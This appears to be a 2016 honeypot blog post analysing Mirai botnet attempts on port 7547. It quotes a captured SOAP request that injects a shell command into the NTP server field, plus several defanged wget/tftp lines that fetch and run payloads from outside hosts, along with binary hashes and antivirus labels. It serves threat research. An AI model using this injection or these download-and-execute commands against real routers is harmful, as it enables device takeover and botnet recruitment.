Meine Blog-Liste

  • end of life - Good morning, as you may have already found out, the posts on this blog have been getting less and less. This is caused by the fact that my two honeypots h...
    vor 1 Jahr

Sonntag, 4. Dezember 2016

This strange SOAP calls (Mirai)

After the huge attack on Deutsche Telekom I decided to update my Honeypot software and also opened port 7547, which was used in this recent attack, to see what the possible interactions might be. Just some hours after restarting the Honeypot I have seen the first attempts.

POST /UD/act?1 hxxp/1.1
Host: 127.0.0[.]1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml\nContent-Length: 519
<?xml version ="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="hxxp://schemas.xmlsoap[.]org/soap/envelope/" SOAP-ENV:encodingStyle="hxxp://schemas.xmlsoap[.]org/soap/encoding/">
<SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /var/tmp;cd /tmp;wget hxxp://binpt[.]pw/a;sh a`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
I have seen several attempts like this

  •  cd /var/tmp;cd /tmp;wget hxxp://binpt[.]pw/a
  • cd /var/tmp;cd /tmp;wget hxxp://srrys[.]pw/a
  • cd /var/tmp;cd /tmp;tftp -l b -r b -g binpt[.]pw;sh b
  • tftp -l b -r b -g srrys[.]pw;sh b
For at least one I was able to fetch the attempted malware


hxxp://binpt[.]pw/a

Which is a simple bash script which then downloads several other files and tries to execute them.

hxxp://binpt[.]pw/1
ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
MD5: e1936defa1f093f52c69072f4b192451

hxxp://binpt[.]pw/2
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
MD5: b92b1fe8c3ca945e1739b0ec81ad99b5

hxxp://binpt[.]pw/3
ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
MD5: fd6a1ec4fd8381d525b7de7a2f317079 

hxxp://binpt[.]pw/4
ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
MD5: 4a8145ae760385c1c000113a9ea00a3a

Good for us, all files are known on VirusTotal and I also shared them with Avira which not have been listed on VirusTotal. As a result Avira has categorized them as

  • 4 MALWARE LINUX/Mirai.oyagk 
  • 3 MALWARE LINUX/Mirai.bzpfn 
  • 2 MALWARE LINUX/Mirai.upnsp
  • 1 MALWARE LINUX/Mirai.armrl 

This report is also available on IBM Xforce Exchange